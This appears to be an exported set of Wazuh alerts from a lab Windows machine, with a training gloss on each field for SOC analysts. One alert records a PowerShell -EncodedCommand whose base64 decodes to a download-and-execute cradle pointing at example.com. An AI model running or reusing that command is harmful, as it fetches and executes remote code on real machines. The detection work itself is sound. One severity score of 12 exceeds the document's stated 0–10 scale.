No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:50:26.949 ProcessGuid: {94294ddc-c032-680a-c10c-000000000e00} ProcessId: 12176 Image: C:\Windows\System32\sdbinst.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Application Compatibility Database Installer Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: sdbinst.exe CommandLine: C:\WINDOWS\System32\sdbinst.exe -m -bg CurrentDirectory: C:\WINDOWS\system32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=D4646168E6E81A16CA2EB703CFE133DED7C3FD8626696AA3CB2A4425E0E54F1D ParentProcessGuid: {94294ddc-ea9e-67fe-9c00-000000000e00} ParentProcessId: 5424 ParentImage: C:\Windows\System32\svchost.exe ParentCommandLine: C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:50:26.949
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c032-680a-c10c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12176
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\sdbinst.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Application Compatibility Database Installer
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  sdbinst.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\System32\\sdbinst.exe -m -bg
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\WINDOWS\\system32\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=D4646168E6E81A16CA2EB703CFE133DED7C3FD8626696AA3CB2A4425E0E54F1D
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea9e-67fe-9c00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  5424
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  C:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  12
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:54:52.661+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:54:52.661+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  67
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535292.2657390
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:54:09.8291801Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43993
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9532
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows System error event

🧠 What happened? Windows System error event

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:54:54.290+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:54:54.290+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows System error event
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61102
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'system_error']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535294.2664727
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-DistributedCOM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {1B562E86-B7AA-4131-BADC-B6F3A001407E}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  DCOM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  10010
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:54:50.1356572Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  3069
Incremental log record number – handy for timeline order.

data.win.system.processID:  336
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  17180
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The server {8CFC164F-4BE5-4FDD-94E9-E2AF73ED4A19} did not register with DCOM within the required timeout."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  {8CFC164F-4BE5-4FDD-94E9-E2AF73ED4A19}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:26.668+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:26.668+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  113
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535326.2666249
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:23.7159287Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350093
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:21.968 ProcessGuid: {94294ddc-c159-680a-cb0c-000000000e00} ProcessId: 14568 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bbde-680a-d909-000000000e00} ParentProcessId: 14832 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:21.968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c159-680a-cb0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14568
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bbde-680a-d909-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14832
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:27.365+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:27.365+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  117
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535327.2673135
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:24.7769762Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350094
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:24.705 ProcessGuid: {94294ddc-c159-680a-cb0c-000000000e00} ProcessId: 14568 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_asllzuor.2bv.ps1 CreationUtcTime: 2025-04-24 22:55:24.702 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:24.705
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c159-680a-cb0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14568
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_asllzuor.2bv.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:24.702
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

